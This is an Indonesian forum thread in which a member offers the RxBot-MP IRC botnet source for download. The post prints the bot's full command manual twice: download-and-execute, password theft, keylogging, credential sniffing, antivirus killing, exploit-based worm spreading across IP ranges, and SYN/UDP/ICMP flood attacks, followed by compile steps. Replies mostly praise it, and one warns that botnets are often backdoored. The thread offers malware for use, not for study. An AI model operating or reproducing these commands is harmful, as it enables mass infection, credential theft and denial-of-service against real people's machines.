RxBot-MP with command [Download - Source]
Moderators: Paman, Xshadow, indounderground
Forum rules
Tool yang diupload oleh member tidak diperiksa oleh kami, mungkin saja terinfeksi oleh malware secara disengaja ataupun tidak, saran kami sebaiknya mendownload tool tersebut dari sumber pembuatnya. Bagi yang buat thread diharapkan menampilkan screenshot tool.
Tool yang diupload oleh member tidak diperiksa oleh kami, mungkin saja terinfeksi oleh malware secara disengaja ataupun tidak, saran kami sebaiknya mendownload tool tersebut dari sumber pembuatnya. Bagi yang buat thread diharapkan menampilkan screenshot tool.
- wiLMaR_kiDz
- Posts: 964
- Joined: Fri Mar 27, 2009 1:03 pm
- Location: internet
- Contact:
RxBot-MP with command [Download - Source]
bismillah hirrohmanirrohim.... hihii.... :tapa: :tapa: :tapa:
.login * login password
.logout * logout
.who * who
.getclip * getclip
.currentip * currentip
.rloginserver * " untested "
.get * get filename.zip
.redirect * redirect
.update * update Http://www.website.com/file.exe BotID.
.download * download http://website.Com/file.exe C:\file.exe 1 ( 1 = execute : 0 = don`t execute )
.execute * execute C:\file.exe
.findfile * findfile file.exe C:\
.findfilestop * findfilestop
.rename * rename botfilename.exe botfilename2.exe
.mode * mode +i-x
.version * version
.gethost * " untested "
.delay * " untested "
.secure * secure
.securestop * stopsecure
.unsecure * unsecure
.join * join #Channel
.part * part #Channel
.netinfo * netinfo
.sysinfo * sysinfo
.raw * raw #Channel +o Himmler
.prefix * prefix $
.open * open File
.server * server Irc.AnotherServer.net
.dns * dns host.name.net
.addalias * addalias " untested "
.privmsg * privmsg #channel hello / nickname fvck u
.action * " untested "
.cycle * " untested "
.die * kill ur bot.exe " is will be back after the next restart
.email * email mx3.hotmail.com [email protected] [email protected] subject msg
.httpcon * httpcon
.upload * upload
.reconnect * reconnect
.disconnect * disconnect
.status * status
.mirccmd * mirccmd " untested "
.cmd * cmd " untested "
.system reboot * restart bot victim machine
.system shutdown * shutdown bot victim machine
.system logoff * logoff bot victim machine
.threads * list threads
.killthread all * kill all threads
.getcdkeys * get cdkeys
.driveinfo * get drivers info
.opencmd * opencmd " untested "
.cmdstop * stopcmd " untested "
.httpserver * httpserver C:\ or D:\
.httpstop * stop http server
.tftpserver * " untested "
.tftpstop * " untested "
.crash * crash bot victim machine ( destroy all system )
.findpass * get bot victim passwords
.nick * change bot nick
.log * list bot log
.clearlog * clear log list
.procs * list all files running in bot victim P.c
.procsstop * procsstop File.exe
.killproc * killprocs File.exe
.delete * delete C:\File.exe
.list* list *.exe or *.zip or *.rar any extensions u want list from bot victim P.c
.visit * visit http://www.website.com ( hiding )
.readfile * readfile C:\file.txt
.psniff on * psniff on
.psniff off * psniff off
.remove * remove ( delete uor bot file from victim pc )
psniff can steal any information about
(bots net) (ftp) (php) (http) (mirc) (users) (accounts) (admins) (opers )
===========================================
.ident on * enable ident server
.ident off * disable ident server
.keylog on * enable key loger
.keylog off * disable key loger " net commands "
.net start * " untested "
.net stop * " untested "
.net pause * " untested "
.net continue * " untested "
.net delete * " untested "
.net share * " untested "
.net user * " untested "
.net send * " untested "
.capture video * " untested "
.capture screen * " untested "
.capture drivers * " untested "
.capture frame * " untested " " clone commands "
======================================
.clone irc.server.net:6667 #Channel " untested "
.c_join " untested "
.c_part " untested "
.C_raw " untested "
.c_mode " untested "
.c_nick " untested "
.c_privmsg " untested "
.c_notice " untested "
.c_rndnick " untested "
.clonestop " untested "
.c_quit " untested " ======================" exploit scanner commands"=========================
-r = random range scanner from the " Bot Ip " Ex: " the bot connect from ip ( 62.150.15.15 ) the -r scanning from 62.150.0.0 to 62.150.255.255 but in random method
-b = same -r but in Sequential method from 62.150.0.0 to 62.150.255.255
-a = long range scanner from first range of bot ip Ex: 62.0.0.0 to 62.255.255.255
-s = silent u can used with all Bot Commands, no reply msg from the bots
x = ip range ex: 0 to 255
u can scan fot ip range u choiced Ex: advscan lsass 100 5 999 62.150.x.x -r
100 = scanner threads
5 = delay in sec
999 = time of scanner
==================
" Exploit Spreader Commands "
.advscan lsass 100 5 999 -r * Lsass Exploit Spreader Using Port 445
.advscan iis5ssl 100 5 999 -b *IIS 5 SSL Exploit Spreader Using Port 443
.advscan dcom135 100 5 999 -a * Dcom Exploit Spreader Using Port 135
.advscan dcom445 100 5 999 -r -s * Dcom Exploit Spreader Using Port 445
.advscan dcom1025 100 5 999 -b -s * Dcom Exploit Spreader Using Port 1025 ( is shit )
.advscan dcom2-135 100 5 999 -a -s* Dcom2 Exploit Spreader Using Port 135
.advscan dcom2-445 100 5 999 -r * Dcom2 Exploit Spreader Using Port 445
.advscan beagle1 100 5 999 -r * Bagle Exploit Spreader Using Port 2745
.advscan beagle2 100 5 999 -r * Bagle2 Exploit Spreader Using Port 2745
.advscan webdav 100 5 999 -r * WebDav Exploit Spreader Using Port 80
.advscan wkssvc 100 5 999 -r * Wks Exploit Spreader Using Port 135
.advscan wkssvc2 100 5 999 -r * Wks Exploit Spreader Using Port 445
.advscan dameware 100 5 999 -r * DameWare Exploit Spreader Using Port 6129
.advscan upnp 100 5 999 -r * UPNP Exploit Spreader Using Port 5000
.advscan mydoom 100 5 999 -r * MyDoom Exploit Spreader Using Port 3127
.advscan netbios 100 5 999 -r * NetBios Exploit Spreader Using Port 139
.advscan ntpass 100 5 999 -r * NB+NP Exploit Spreader Using Port 445
.advscan mssql 100 5 999 -r * MSSQL Exploit Spreader Using Port 1433
.scanstats * Get Scan Stats
.scanstop * Stop Scanning ==========================================
Trojan Spreader Scanner Commands
.advscan optix 100 5 999 -r * Optix Trojan Spreader Using Port 3410
.advscan sub7 100 5 999 -r * Sub7 Trojan Spreader Using Port 27374
.advscan netdevil 100 5 999 -r * NetDevil Trojan Spreader Using Port 901
.advscan netdevil2 100 5 999 -r * NetDevil Trojan Spreader Using Port 903 ================================================== =========
Attack Commands " UnTested "
.icmpflood * icmpflood 62.150.15.15 99999
.synflood * synflood 62.150.15.15 1000 2000
.udpflood * udpflood Ip Number Size Delay
.pingflood * pingflood Ip Number Size Delay
.tcpflood * Ip Port r
r = random ?stop attacking commands
.icmpstop
.tcpstop
.synstop
.udpstop
.pingstop
---------------------------------------------------------------------
* added "Wks Spreader" with 2 commands "wkssvc = 135 / wkssvc2 = 445
* added "lsass exploit Spreader"
* added "iis5sll exploit spreader" fixed some lines
* update "Processes.cpp" with 660 AV/FW to kill on startup
* added " new port (901)&(903) to NetDevil Spreader "netdevil/netdevil2
* added " Php sniff " to psniff.cpp
* fixed "Sub7 port" to 27374 was 27347
* fixed "Optix port" to 3410 was 3140
* fixed 6 spreader commands in "advscan.cpp" ( true- false ) was ( false - false )
++++++++++++++++others++++++++++++++++
+ irc_connect line split truncation issue
+ disconnect for period of time and reconnect
+ p2p code add-in (for people who want it)
+ Registry editor
+ apache
+ iss
+ sll
---------------------------------------------------------------------------------------------
yang di perlukan: vb 6.0 dengan >
Service Sack 5 (*)
and the newest Platform sdk (**)
and the newest Processor Pack (***).
(*) http://msdn.microsoft.com/vstudio/do...es/sp/vs6/sp5/
(**) http://www.microsoft.com/msdownload/...sdk/sdkupdate/ (core sdk/build environment) (***) http://msdn.microsoft.com/vstudio/do...k/default.aspx
Install,kemudian tambahkan path ini ke
"tools|options...|directories" in visual studio (be sure to include them on top of the list):
to show directories for|Executable files: <path to sdk>\microsoft sdk\bin
to show directories for|Include files: <path to sdk>\microsoft sdk\include
to show directories for|Library files: <path to sdk>\microsoft sdk\lib
catatan:
1. pastikan jalan tambahan berada di daftar atas!
2. anda tidak perlu men-download SDK 129mb penuh, hanya core sdk/build environment.
3. harus di compile..
download source code :malumalu: :malumalu:
.login * login password
.logout * logout
.who * who
.getclip * getclip
.currentip * currentip
.rloginserver * " untested "
.get * get filename.zip
.redirect * redirect
.update * update Http://www.website.com/file.exe BotID.
.download * download http://website.Com/file.exe C:\file.exe 1 ( 1 = execute : 0 = don`t execute )
.execute * execute C:\file.exe
.findfile * findfile file.exe C:\
.findfilestop * findfilestop
.rename * rename botfilename.exe botfilename2.exe
.mode * mode +i-x
.version * version
.gethost * " untested "
.delay * " untested "
.secure * secure
.securestop * stopsecure
.unsecure * unsecure
.join * join #Channel
.part * part #Channel
.netinfo * netinfo
.sysinfo * sysinfo
.raw * raw #Channel +o Himmler
.prefix * prefix $
.open * open File
.server * server Irc.AnotherServer.net
.dns * dns host.name.net
.addalias * addalias " untested "
.privmsg * privmsg #channel hello / nickname fvck u
.action * " untested "
.cycle * " untested "
.die * kill ur bot.exe " is will be back after the next restart
.email * email mx3.hotmail.com [email protected] [email protected] subject msg
.httpcon * httpcon
.upload * upload
.reconnect * reconnect
.disconnect * disconnect
.status * status
.mirccmd * mirccmd " untested "
.cmd * cmd " untested "
.system reboot * restart bot victim machine
.system shutdown * shutdown bot victim machine
.system logoff * logoff bot victim machine
.threads * list threads
.killthread all * kill all threads
.getcdkeys * get cdkeys
.driveinfo * get drivers info
.opencmd * opencmd " untested "
.cmdstop * stopcmd " untested "
.httpserver * httpserver C:\ or D:\
.httpstop * stop http server
.tftpserver * " untested "
.tftpstop * " untested "
.crash * crash bot victim machine ( destroy all system )
.findpass * get bot victim passwords
.nick * change bot nick
.log * list bot log
.clearlog * clear log list
.procs * list all files running in bot victim P.c
.procsstop * procsstop File.exe
.killproc * killprocs File.exe
.delete * delete C:\File.exe
.list* list *.exe or *.zip or *.rar any extensions u want list from bot victim P.c
.visit * visit http://www.website.com ( hiding )
.readfile * readfile C:\file.txt
.psniff on * psniff on
.psniff off * psniff off
.remove * remove ( delete uor bot file from victim pc )
psniff can steal any information about
(bots net) (ftp) (php) (http) (mirc) (users) (accounts) (admins) (opers )
===========================================
.ident on * enable ident server
.ident off * disable ident server
.keylog on * enable key loger
.keylog off * disable key loger " net commands "
.net start * " untested "
.net stop * " untested "
.net pause * " untested "
.net continue * " untested "
.net delete * " untested "
.net share * " untested "
.net user * " untested "
.net send * " untested "
.capture video * " untested "
.capture screen * " untested "
.capture drivers * " untested "
.capture frame * " untested " " clone commands "
======================================
.clone irc.server.net:6667 #Channel " untested "
.c_join " untested "
.c_part " untested "
.C_raw " untested "
.c_mode " untested "
.c_nick " untested "
.c_privmsg " untested "
.c_notice " untested "
.c_rndnick " untested "
.clonestop " untested "
.c_quit " untested " ======================" exploit scanner commands"=========================
-r = random range scanner from the " Bot Ip " Ex: " the bot connect from ip ( 62.150.15.15 ) the -r scanning from 62.150.0.0 to 62.150.255.255 but in random method
-b = same -r but in Sequential method from 62.150.0.0 to 62.150.255.255
-a = long range scanner from first range of bot ip Ex: 62.0.0.0 to 62.255.255.255
-s = silent u can used with all Bot Commands, no reply msg from the bots
x = ip range ex: 0 to 255
u can scan fot ip range u choiced Ex: advscan lsass 100 5 999 62.150.x.x -r
100 = scanner threads
5 = delay in sec
999 = time of scanner
==================
" Exploit Spreader Commands "
.advscan lsass 100 5 999 -r * Lsass Exploit Spreader Using Port 445
.advscan iis5ssl 100 5 999 -b *IIS 5 SSL Exploit Spreader Using Port 443
.advscan dcom135 100 5 999 -a * Dcom Exploit Spreader Using Port 135
.advscan dcom445 100 5 999 -r -s * Dcom Exploit Spreader Using Port 445
.advscan dcom1025 100 5 999 -b -s * Dcom Exploit Spreader Using Port 1025 ( is shit )
.advscan dcom2-135 100 5 999 -a -s* Dcom2 Exploit Spreader Using Port 135
.advscan dcom2-445 100 5 999 -r * Dcom2 Exploit Spreader Using Port 445
.advscan beagle1 100 5 999 -r * Bagle Exploit Spreader Using Port 2745
.advscan beagle2 100 5 999 -r * Bagle2 Exploit Spreader Using Port 2745
.advscan webdav 100 5 999 -r * WebDav Exploit Spreader Using Port 80
.advscan wkssvc 100 5 999 -r * Wks Exploit Spreader Using Port 135
.advscan wkssvc2 100 5 999 -r * Wks Exploit Spreader Using Port 445
.advscan dameware 100 5 999 -r * DameWare Exploit Spreader Using Port 6129
.advscan upnp 100 5 999 -r * UPNP Exploit Spreader Using Port 5000
.advscan mydoom 100 5 999 -r * MyDoom Exploit Spreader Using Port 3127
.advscan netbios 100 5 999 -r * NetBios Exploit Spreader Using Port 139
.advscan ntpass 100 5 999 -r * NB+NP Exploit Spreader Using Port 445
.advscan mssql 100 5 999 -r * MSSQL Exploit Spreader Using Port 1433
.scanstats * Get Scan Stats
.scanstop * Stop Scanning ==========================================
Trojan Spreader Scanner Commands
.advscan optix 100 5 999 -r * Optix Trojan Spreader Using Port 3410
.advscan sub7 100 5 999 -r * Sub7 Trojan Spreader Using Port 27374
.advscan netdevil 100 5 999 -r * NetDevil Trojan Spreader Using Port 901
.advscan netdevil2 100 5 999 -r * NetDevil Trojan Spreader Using Port 903 ================================================== =========
Attack Commands " UnTested "
.icmpflood * icmpflood 62.150.15.15 99999
.synflood * synflood 62.150.15.15 1000 2000
.udpflood * udpflood Ip Number Size Delay
.pingflood * pingflood Ip Number Size Delay
.tcpflood * Ip Port r
r = random ?stop attacking commands
.icmpstop
.tcpstop
.synstop
.udpstop
.pingstop
---------------------------------------------------------------------
* added "Wks Spreader" with 2 commands "wkssvc = 135 / wkssvc2 = 445
* added "lsass exploit Spreader"
* added "iis5sll exploit spreader" fixed some lines
* update "Processes.cpp" with 660 AV/FW to kill on startup
* added " new port (901)&(903) to NetDevil Spreader "netdevil/netdevil2
* added " Php sniff " to psniff.cpp
* fixed "Sub7 port" to 27374 was 27347
* fixed "Optix port" to 3410 was 3140
* fixed 6 spreader commands in "advscan.cpp" ( true- false ) was ( false - false )
++++++++++++++++others++++++++++++++++
+ irc_connect line split truncation issue
+ disconnect for period of time and reconnect
+ p2p code add-in (for people who want it)
+ Registry editor
+ apache
+ iss
+ sll
---------------------------------------------------------------------------------------------
yang di perlukan: vb 6.0 dengan >
Service Sack 5 (*)
and the newest Platform sdk (**)
and the newest Processor Pack (***).
(*) http://msdn.microsoft.com/vstudio/do...es/sp/vs6/sp5/
(**) http://www.microsoft.com/msdownload/...sdk/sdkupdate/ (core sdk/build environment) (***) http://msdn.microsoft.com/vstudio/do...k/default.aspx
Install,kemudian tambahkan path ini ke
"tools|options...|directories" in visual studio (be sure to include them on top of the list):
to show directories for|Executable files: <path to sdk>\microsoft sdk\bin
to show directories for|Include files: <path to sdk>\microsoft sdk\include
to show directories for|Library files: <path to sdk>\microsoft sdk\lib
catatan:
1. pastikan jalan tambahan berada di daftar atas!
2. anda tidak perlu men-download SDK 129mb penuh, hanya core sdk/build environment.
3. harus di compile..
download source code :malumalu: :malumalu:
Last edited by wiLMaR_kiDz on Mon Oct 12, 2009 3:48 pm, edited 1 time in total.
regards,
ordinary user,-
ordinary user,-
Re: RxBot-MP with command(download source)
hhehehee. keren.. calon mod nih...... keep sharing bro
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
- wiLMaR_kiDz
- Posts: 964
- Joined: Fri Mar 27, 2009 1:03 pm
- Location: internet
- Contact:
Re: RxBot-MP with command(download source)
mmmh...brlbhan bg poni neh..poni wrote:hhehehee. keren.. calon mod nih...... keep sharing bro
buat skrg,smw yg ane plajari,ane dpt,ane bagi,-+ trinsprasi dr ap yg bg poni,bg adi.n&momod yogyafree lain lakukan,..
terima kasih buat smua momod,admin dan tmn2 member di yf..
| yogyafree | xcode | yogyafamilycode |
"hanya ingin menulis ap yg ingin qu tulis,berbagi apa yg quw dpt dan qu tw"
regards,
ordinary user,-
ordinary user,-
Re: RxBot-MP with command(download source)
cicip.. cicip.. kalo kesedak tanya lagi.. thanks ya pak..
- wiLMaR_kiDz
- Posts: 964
- Joined: Fri Mar 27, 2009 1:03 pm
- Location: internet
- Contact:
Re: RxBot-MP with command(download source)
klo kesedak minum air putih lah bos...shad.hckr wrote:cicip.. cicip.. kalo kesedak tanya lagi.. thanks ya pak..
regards,
ordinary user,-
ordinary user,-
Re: RxBot-MP with command [download source]
Beware if you use botnets!
Theres are many f*ckin backdoored sh*ts!
Theres are many f*ckin backdoored sh*ts!
Down doesn't mean die.
I will never die,
gbLaCk-
- wiLMaR_kiDz
- Posts: 964
- Joined: Fri Mar 27, 2009 1:03 pm
- Location: internet
- Contact:
Re: RxBot-MP with command [download source]
yuppz..that's true...gblack wrote:Beware if you use botnets!
Theres are many f*ckin backdoored sh*ts!
thankz 4 r3mind Guru gbLack..
regards,
ordinary user,-
ordinary user,-
Re: RxBot-MP with command [download source]
sip2 ak ngikut kk heehhehhewiLMaR_kiDz wrote:yuppz..that's true...gblack wrote:Beware if you use botnets!
Theres are many f*ckin backdoored sh*ts!
thankz 4 r3mind Guru gblack..
i am not detractor person..like u
be a good boy..
be a good boy..
-
- Posts: 129
- Joined: Thu Jul 23, 2009 12:07 am
- Contact:
Re: RxBot-MP with command [Download - Source]
ni mksdny untuk apa ya ??
blh mnta penjelasan lagi gak ???
blh mnta penjelasan lagi gak ???
- wiLMaR_kiDz
- Posts: 964
- Joined: Fri Mar 27, 2009 1:03 pm
- Location: internet
- Contact:
Re: RxBot-MP with command [Download - Source]
this is a botnets bro...kocokprotol wrote:ni mksdny untuk apa ya ??
blh mnta penjelasan lagi gak ???
msh ingt trgedi master poni yg ngshoot kpu??.
gini deh, cba ente buka magazine 13 gih..
apa tu botnet...
di situ d jlaskan scara jelas2ny oleh master poni(botmaster)..
:maaf: :maaf: :maaf:
regards,
ordinary user,-
ordinary user,-